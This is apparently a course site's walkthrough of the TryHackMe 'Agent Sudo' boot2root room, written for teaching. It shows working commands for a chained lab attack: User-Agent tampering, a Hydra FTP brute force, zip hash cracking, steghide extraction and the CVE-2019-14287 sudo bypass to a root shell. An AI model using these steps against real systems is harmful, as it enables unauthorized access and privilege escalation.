Papadope Course
EN | ΕΛ

Agent Sudo - TryHackMe Walkthrough

Agent Sudo - TryHackMe Walkthrough

A beginner-friendly boot2root machine featuring User-Agent header tampering, FTP brute forcing, steganography, password cracking, and privilege escalation via a sudo bypass.

Room URL: https://tryhackme.com/room/agentsudoctf

Difficulty: Easy

Tools & Techniques Used

  • Nmap
  • curl (custom User-Agent)
  • Hydra (FTP brute force)
  • FTP
  • binwalk / 7z (extract hidden data)
  • steghide (steganography)
  • zip2john + John the Ripper
  • base64 decoding
  • SSH
  • sudo misconfiguration (CVE-2019-14287)

Step-by-Step Walkthrough

1. Enumeration

Run an initial scan to identify services:

nmap -sC -sV -oN nmap.txt <TARGET_IP>

Typical findings:

Port Service Notes
21 FTP Credentials required
22 SSH OpenSSH
80 HTTP Apache web server

2. Web Enumeration (User-Agent)

Browse to http://<TARGET_IP>/.

The landing page suggests the site responds differently based on the User-Agent header. Since it mentions multiple agents, cycle User-Agents (e.g., letters) until you find the one that unlocks more content.

Example using curl:

curl -A "C" http://<TARGET_IP>/

When the correct User-Agent is used (commonly Agent C), you should be redirected to an “agent C attention” page.

From the hint, identify a username (commonly chris).

3. FTP Access (Brute Force)

Brute force FTP for the discovered user:

hydra -l chris -P /usr/share/wordlists/SecLists/Passwords/500-worst-passwords.txt ftp://<TARGET_IP>

Log in and download the available files:

ftp <TARGET_IP>
# Username: chris
# Password: <CRACKED_PASSWORD>

# Then:
# get <files>

You should retrieve:

  • A text note (agent hint)
  • An image likely containing hidden data
  • A second image/archive container

4. Hidden Data (Archive + Stego)

Extract hidden archive from the image

Try extracting embedded data:

binwalk -e <IMAGE_FILE>

If you find a zip file, crack it:

zip2john <ZIP_FILE> > zip.hash
john --wordlist=/usr/share/wordlists/rockyou.txt zip.hash

Unzip with the recovered password:

7z x <ZIP_FILE>

One of the extracted notes typically includes a base64 string that decodes to the passphrase for the stego image.

Decode it:

echo "<BASE64_STRING>" | base64 -d

Extract the stego content

Use the decoded passphrase with steghide:

steghide extract -sf <STEGO_IMAGE>
# Enter passphrase when prompted

This should reveal SSH credentials for a user (commonly james).

5. SSH Login

SSH in with the discovered credentials:

ssh james@<TARGET_IP>

Collect the user flag in user.txt.

6. Privilege Escalation (sudo bypass)

Check sudo rights:

sudo -l

A common misconfiguration for this room is a rule that allows running commands as any user except root, which is vulnerable to CVE-2019-14287.

Exploit it by specifying user ID -1:

sudo -u#-1 /bin/bash

You should now have a root shell.

Collect the root flag in /root/root.txt.

Notes

  • Redact any real passwords/flags if publishing publicly.
  • The key learning points are:
    • Header-based access control (User-Agent)
    • Chained enumeration (web -> FTP -> stego -> SSH)
    • sudo policy weaknesses and why they matter
Previous Lesson 4 - HTTP Basics and Web Tools Next Basic Pentesting - TryHackMe Walkthrough